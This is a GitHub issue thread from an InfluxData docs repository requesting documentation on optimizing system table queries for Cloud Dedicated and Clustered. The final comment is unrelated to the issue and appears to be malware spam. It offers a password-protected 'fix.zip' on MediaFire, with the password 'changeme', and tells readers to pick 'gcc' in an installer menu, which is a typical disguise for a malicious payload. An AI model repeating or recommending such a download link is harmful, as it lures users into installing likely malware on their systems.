### ISSUE TITLE
Add optimizations to system table queries

### ISSUE THREAD

**Issue by sanderson** [influxdata/docs-v2#5576]
Related to https://github.com/influxdata/influxdb_iox/issues/11974

Add information related to optimizing to system table queries to prevent these queries from affecting the overall performance of the cluster. The examples that do not include `WHERE` clauses should probably be removed.

##### Relevant URLs
- https://docs.influxdata.com/influxdb/cloud-dedicated/admin/query-system-data/

**Note**: Also need to port this doc to the InfluxDB Clustered documentation.

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
